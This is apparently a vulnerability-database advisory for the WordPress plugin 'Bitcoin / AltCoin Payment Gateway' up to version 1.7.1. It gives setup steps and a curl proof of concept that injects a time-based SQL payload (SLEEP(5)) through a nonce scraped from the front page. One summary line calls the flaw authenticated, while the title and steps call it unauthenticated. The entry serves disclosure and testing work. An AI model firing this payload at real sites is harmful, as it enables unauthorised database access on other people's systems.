Lucene search

K
wpexploitCydaveWPEX-ID:2839FF82-7D37-4392-8FA3-D490680D42C4
HistoryApr 17, 2023 - 12:00 a.m.

Bitcoin / AltCoin Payment Gateway <= 1.7.1 - Unauthenticated SQLi

2023-04-1700:00:00
cydave
86
wordpress
woocommerce
altcoin payment
sql injection
unauthenticated user
security exploit
curl command

EPSS

0.002

Percentile

60.1%

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users

Setup:

1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (woo-altcoin-payment-gateway version 1.7.1)
3. In the AltCoin Payment settings, enable the AltCoin payment gateway (/wp-admin/admin.php?page=cs-woo-altcoin-gateway-settings)
4. Add a new coin (/wp-admin/admin.php?page=cs-woo-altcoin-add-new-coin), with the following dummy values:

Payment Confirmation Type: Manual
Enter Coin Name: Bitcoin
Enter Coin Wallet Address: 1KPLgee6crr7u1KQxwnnu4isizufxadVPZ
Active / Deactivate: checked

Attack:

1. As an unauthenticated user, visit the main page of the WordPress instance to extract the nonce - CTRL+F for "cs_token"
2. Invoke the following curl command, with the just obtained nonce, to induce a 5 second sleep:

time curl 'https://example.com/wp-admin/admin-ajax.php?action=_cs_wapg_custom_call&cs_token=<NONCE>&order=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(5)%20ELSE%201%20END)' \
    --data 'method=admin\options\functions\Coin_List@prepare_items'

EPSS

0.002

Percentile

60.1%

Related for WPEX-ID:2839FF82-7D37-4392-8FA3-D490680D42C4